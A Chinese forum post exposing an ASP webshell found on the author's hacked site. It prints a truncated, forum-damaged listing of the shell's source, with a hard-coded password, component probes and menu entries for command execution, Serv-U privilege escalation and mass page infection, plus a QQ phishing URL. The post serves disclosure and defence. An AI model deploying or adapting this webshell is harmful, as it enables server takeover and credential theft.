


标题: [原创] 揭露ASP木马作者的丑恶面目!
IhxR
[原创] 揭露ASP木马作者的丑恶面目!
揭露ASP木马作者的丑恶面目!


今天,我的空间又被植入了跳转木马,又是盗QQ号的那些。不过,在清除木马的过程中,居然让我找到了该杀的木马入侵者留下的控制ASP。查看一下源程序,哈,ASP木马作者的签名还在上面。
全部公布出来,让大家见识一下这些丑恶的家伙们。
跳转的QQ盗号网页:http://www.pkck.cn/web.htm
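后缀名:.asa(IIS 的默认脚本映射通常也把 .asa 交给 ASP 引擎执行,所以排查后门和做上传过滤时不能只看 .asp)
源程序如下(注意:下面贴出的代码并不完整,末尾的函数没有结束;另外有些字符看起来被论坛程序过滤或替换过,不能当作原始样本逐字比对):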
<%
' Configuration header of the ASP script the poster found on the compromised site.
' Defensive reading: the literals assigned below are operator-chosen strings, which
' makes them practical search terms when sweeping a web root for copies of this file.

' Raises the per-page script timeout (in seconds) to a value that is effectively "never".
Server.ScriptTimeout=999999999
' Output is buffered; ShowErr later calls Response.Flush to push it out.
Response.Buffer =true
On Error Resume Next ' runtime errors no longer stop the script; they are only visible through Err
' Hard-coded secret. In the visible code it is only copied to serverp.
' NOTE(review): presumably the login password checked further down - that part is not shown.
UserPass="2201511"
' Branding strings: mName is written into the page title and menu, SiteURL is the menu link target.
mName="小康's Home"
SiteURL="http://www.55130.cn/"
' Not referenced anywhere in the visible part of the listing.
Copyright="好好学习,天天向上"

' Prints the pending runtime error, if there is one, as a "go back" link and then resets it.
' Err.Description is written into the page as-is, without HTML encoding.
sub ShowErr()
  If Err Then
    RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
    ' Reset the error state and send the buffered output to the client.
    Err.Clear:Response.Flush
  End If
end sub
' Output helper used throughout the script: a thin wrapper around Response.Write.
' str is emitted unchanged; no HTML encoding happens here.
Sub RRS(str)
        response.write(str)
End Sub
' Returns S with every backslash doubled. The visible callers use it when a
' Windows path is embedded inside a JavaScript string literal in the generated page.
Function RePath(S)
  RePath=Replace(S,"\","\\")
End Function
' Inverse of RePath: returns S with every doubled backslash collapsed to a single one.
' Used on the client-supplied FolderPath before it is stored in the session.
Function RRePath(S)
  RRePath=Replace(S,"\\","\")
End Function
' Collects request and server context into globals used by the rest of the script.
' Path of the current page; reused below as the form action.
URL=Request.ServerVariables("URL")
' Server-side IP address; shown in the page title and in the connection-string templates.
ServerIP=Request.ServerVariables("LOCAL_ADDR")
' Dispatch selector taken straight from the client. Request(name) without a collection
' searches the query string, form and the other request collections.
Action=Request("Action")
' Physical directory of this script and physical root of the web site.
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
' Host name plus page path of this script, and a copy of the hard-coded secret.
' NOTE(review): neither serveru nor serverp is used in the visible part; their purpose cannot be confirmed from here.
serveru=request.servervariables("http_host")&url
serverp=userpass
' Client-supplied path and file-name arguments; no validation is applied at this point.
FolderPath=Request("FolderPath")
FName=Request("FName")

' Emits the HTML prologue of every page: charset, title, stylesheet, client-side helper
' script and the opening <body> tag.
' NOTE(review): several literals in this span look altered by the forum software that
' hosted the listing (see the notes below), so this text should not be treated as a
' byte-exact copy of the original file.
BackUrl="<br><br><center><a href='javascript:history.back()'>返回</a></center>"
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
' The title combines the branding string with the server's own IP address.
RRS"<title>"&mName&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:#444;color:#eee;}"
RRS"input,select,textarea{font-size: 12px;background-color:#ddd;border:1px solid #fff}"
RRS".C{background-color:#444;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS"</style>"
' Client-side script: window.onerror is replaced so JavaScript errors are hidden.
RRS"<script language=javascript>function killErrors(){return true;}window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""确认要执行此操作吗?""))return true;else return false;}"
' Status-bar clock. AD is not assigned anywhere in the visible code, so it contributes an empty string here.
RRS"function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""→"&AD&"  --""+display;}runClock();"
' ShowFolder submits the address form with a new FolderPath value.
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}"
' FullForm fills the hidden form (FName, Action) and submits it; for copy/move actions the
' source and destination names are joined with "||||" in FName.
RRS"function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""请输入复制到目标文件全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""请输入移动到目标文件全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""请输入移动到目标文件夹全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""请输入移动到目标文件夹全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""请输入要新建的文件夹全名称"",FName);top.hideform.FName.value = DName;}else if(FAction==""CreateMdb""){DName = prompt(""请输入要新建的Mdb文件全名称,注意不能同名!"",FName);top.hideform.FName.value = DName;}else if(FAction==""CompactMdb""){DName = prompt(""请输入要压缩的Mdb文件全名称,注意文件是否存在!"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""请先连接数据库"");FullDbStr(0);return false;}return true;}"
' FullDbStr holds template connection strings (entries 0-3), template SQL statements
' (entries 4-11) and a help text (entry 12).
' NOTE(review): "rovider=", "OLEDBatabase", "Uid=sawd=" and the bare "Str" where an indexed
' element would be expected look like characters lost to forum smiley/BBCode processing - confirm against a real sample.
RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""rovider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDBatabase Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sawd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&"ort=3306;Database=DbName;Uid=rootwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。"";if(i<=3){DbForm.DbStr.value = Str;DbForm.SqlStr.value = """";abc.innerHTML=""<center>请确认己连接数据库再输入SQL操作命令语句。</center>"";}else if(i==12){alert(Str);}else{DbForm.SqlStr.value = Str;}return true;}"
' FullSqlStr performs length checks on the connection string and SQL text, then submits DbForm.
RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""请检查数据库连接串是否正确!"");return false;}if(str.length<10){alert(""请检查SQL语句是否正确!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
RRS"</script>"
' Opening <body> tag; scrolling is switched off only when no Action was requested.
rrs "<body"
If Action="" then RRS " scroll=no"
rrs ">"
' Capability probe. ObT is a 14-row table: column 0 holds a COM ProgID, column 2 a
' human-readable label, and column 1 is filled in by the loop below with an
' availability mark.
' Defensive reading: the ProgIDs listed here (file system, command shell, Access/ADO,
' upload, mail, HTTP client) are the server components this script relies on. Removing
' or access-restricting the ones a site does not need for the web application identity
' narrows what a script of this kind can do, and Server.CreateObject calls for them in
' unexpected files are a useful review signal.
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
  ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell"
  ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
  ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
  ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary"
  ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection"
  ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream"
  ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
  ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
  ObT(8,2) = "刘云峰文件上传组件"
' NOTE(review): "ersits.Upload.1" looks like a ProgID whose first letter was lost when the
' listing was posted (the label names ASPUpload) - confirm against a real sample.
ObT(9,0) = "ersits.Upload.1"
  ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
  ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
  ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
  ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
  ObT(13,2) = "数据传输组件"
' Try to instantiate each ProgID. Because of the earlier On Error Resume Next a failure
' does not abort the page; it only sets Err.
For i=0 To 13
        Set T=Server.CreateObject(ObT(i,0))
        ' Only error number -2147221005 (0x800401F3) is treated as "not available".
        ' Any other outcome, including a different error, is marked as available.
        If -2147221005 <> Err Then
          IsObj=" √"
        Else
          IsObj=" ×"
          Err.Clear
        End If
        Set T=Nothing
        ObT(i,1)=IsObj
Next
' Tracks the "current folder" in the ASP session.
' A client-supplied FolderPath replaces the stored value after doubled backslashes are
' collapsed; nothing in this block restricts the path to the web root.
If FolderPath<>"" then
  Session("FolderPath")=RRePath(FolderPath)
End If
' First visit (nothing stored yet): start in the directory that contains this script.
If Session("FolderPath")="" Then
  FolderPath=RootPath
  Session("FolderPath")=FolderPath
End if
' Writes the outer page layout: a hidden form (Action, FName) that targets the frame named
' FileFrame, an address bar form that posts FolderPath back to this page, and a two-pane
' table. Declared as a Function but assigns no return value.
' URL and Session("FolderPath") are concatenated into HTML attributes without encoding.
' Defensive reading: the two panes are loaded through ?Action=MainMenu and
' ?Action=Show1File, so those query strings would be expected in web server access
' logs for requests to a copy of this script.
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%'  border=0 cellpadding='0' cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit' type='submit' value='转到'> <input type='submit' value='刷新主窗口' onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
' NOTE(review): "Do you Qihoo?rame" and "</i-frame-X>" on the next lines look like the
' result of a forum content filter rewriting inline-frame tags; the posted text is
' presumably not what the original file contained - confirm against a real sample.
RRS"Do you Qihoo?rame name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></i-frame-X></td>"
RRS"<td>"
RRS"Do you Qihoo?rame name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></i-frame-X>"
RRS"</td></tr></table>"
End Function
Function MainMenu()
RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
RRS"<tr><td height='5'></td></tr>"
RRS"<tr><td><center><a href='"&SiteURL&"' target='_blank'><font color=red>"&mName&"</font></center></a><hr hight=1 width='100%'>"
RRS"</td></tr>"
If ObT(0,1)=" ×" Then
RRS"<tr><td height='24'>无权限</td></tr>"
Else
RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""><b> +>查看硬盘</b><div id=menu1 style=""width:100%;display='none'"" onmouseout=""menu1.style.display='none'"">"
Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>->站点<b>根目录</b></a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>->本程序目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program Files"")'>→Program Files</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>->pcAnywhere</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序<hr style='border:1px solid #222;' /></a></td></tr>"
RRS""
RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>->新建目录</a></td></tr>"
RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>->新建文本</a></td></tr>"
End If
RRS"<tr><td height='24' onmouseover=""menu2.style.display=''""><b>+>数据库操作</b><div id=menu2 style=""line-height:18px;width:100%;display='none'"" onmouseout=""menu2.style.display='none'"">"
RRS"   <a href='?Action=DbManager' target='FileFrame'>连接数据库</a><br>"
RRS"   <a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\New.mdb")&""",""CreateMdb"")'>建立MDB文件</a><br>"
RRS"   <a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\data.mdb")&""",""CompactMdb"")'>压缩MDB文件</a></div></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>->系统服务-用户账号</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=getTerminalInfo' target='FileFrame'><b>->终端端口-自动登录</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ServerInfo' target='FileFrame'>->服务器信息-组件支持</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'><b>->执行CMD命令</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>->上传文件</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'><b>->Servu提权</b>(超强版)</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'><b>->查找文件-木马</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>->批量<b>挂马</b>(超强版)</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>->批量<b>清马</b>(超强版)</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>->批量<b>替换</b>(超强版)</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>->批量挂马(普通版)</a></b></td></tr>"

夜天使
这些人真垃圾

  


 